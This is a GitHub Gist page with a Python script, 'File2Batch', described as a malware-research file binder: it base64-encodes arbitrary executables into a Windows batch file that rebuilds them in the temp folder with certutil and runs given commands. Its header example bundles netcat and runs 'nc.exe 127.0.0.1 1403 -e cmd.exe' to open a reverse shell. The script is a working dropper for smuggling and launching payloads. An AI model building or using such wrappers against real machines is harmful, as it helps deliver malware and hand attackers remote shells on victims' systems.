Last active
April 3, 2021 13:21
-
-
Save DarkCoderSc/afe9759e42915cd463fbba7531d3c9d6 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #----------------------------------------------------------------------------------------------------------------------- | |
| # PHROZEN SAS (c) 2018 - www.phrozen.io | |
| # Jean-Pierre LESUEUR ([email protected]) | |
| # | |
| # Name : File2Batch | |
| # Description : File Binder (Wrapper) only using Batch commands (.BAT output extension) | |
| # Category : Malware Research | |
| # Version : 0.1 (07/02/2018) | |
| # Target OS : Windows XP->Windows 10 (32/64bit) | |
| # License : MIT | |
| # | |
| # Example of command: | |
| # python File2Batch.py -f "c:\tmp\nc.exe" -f "c:\tmp\cports.exe" -f "c:\tmp\test.jpg" -o "c:\tmp\test.bat" -c "nc.exe 127.0.0.1 1403 -e cmd.exe" -c "cports.exe" -c "test.jpg" | |
| # | |
| # This command will extract from a batch file netcat (nc.exe), Nirsoft Active Ports (cports) and a picture to temp folder | |
| # When the batch file is launched, netcat open a reverse shell to localhost, Active Ports and the picture are just executed | |
| #----------------------------------------------------------------------------------------------------------------------- | |
| import base64 | |
| import argparse | |
| import os | |
| # Define arguments | |
| parser = argparse.ArgumentParser(description='File2Batch') | |
| parser.add_argument('-f', action="append", dest="srcFiles", metavar='in-file', type=argparse.FileType('rb'), required=True, help="File to be encoded in the output batch file (Support collection Ex: -f file1.exe -f file2.jpg -f [...])") | |
| parser.add_argument('-o', action="store", dest="outFile", metavar='out-file', type=argparse.FileType('wt'), required=True, help="Output batch file (Encoded Files Container).") | |
| parser.add_argument('-c', action="append", dest="postCmds", required=False, default=[], help="Command Line to execute after extracting embedded files (Support collection Ex: -c command1 -c command2 -c [...])") | |
| try: | |
| argv = parser.parse_args() | |
| except IOError: | |
| parser.error() | |
| # Split a long string in chunks of 2000 characters | |
| def splitStr(str): | |
| return [str[i : i + 2000] for i in range(0, len(str), 2000)] | |
| batchContent = "@echo off"; | |
| # Include each input files inside the futur output batch file | |
| for inFile in argv.srcFiles: | |
| # Encode file to base64 (to be stored as string) | |
| with open(inFile.name, inFile.mode) as file: | |
| encodedFile64 = base64.b64encode(file.read()).decode('ascii') | |
| baseName = os.path.basename(inFile.name) | |
| tempFile = "%temp%\\" + os.path.splitext(baseName)[0] + ".b64" | |
| # Delete old extracted encoded file | |
| batchContent += "del " + tempFile + "\n" | |
| # Splitting base64 in chunks of 2000 characters (Due to echo command length limitation) | |
| chunks = splitStr(encodedFile64) | |
| for chunk in chunks: | |
| #batchContent += "echo " + chunk + " >> " + tempFile + "\n" | |
| batchContent += "echo|set /P =" + chunk + " >> " + tempFile + "& cls\n" | |
| # Run certutil decode command to transform TODO | |
| batchContent += "certutil -decode " + tempFile + " %TEMP%\\" + baseName + "\n" | |
| # Execute post commands | |
| for command in argv.postCmds: | |
| batchContent += "start %TEMP%\\" + command + "\n" | |
| # Write the final batch file | |
| with open(argv.outFile.name, argv.outFile.mode) as destBatch: | |
| destBatch.write(batchContent) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment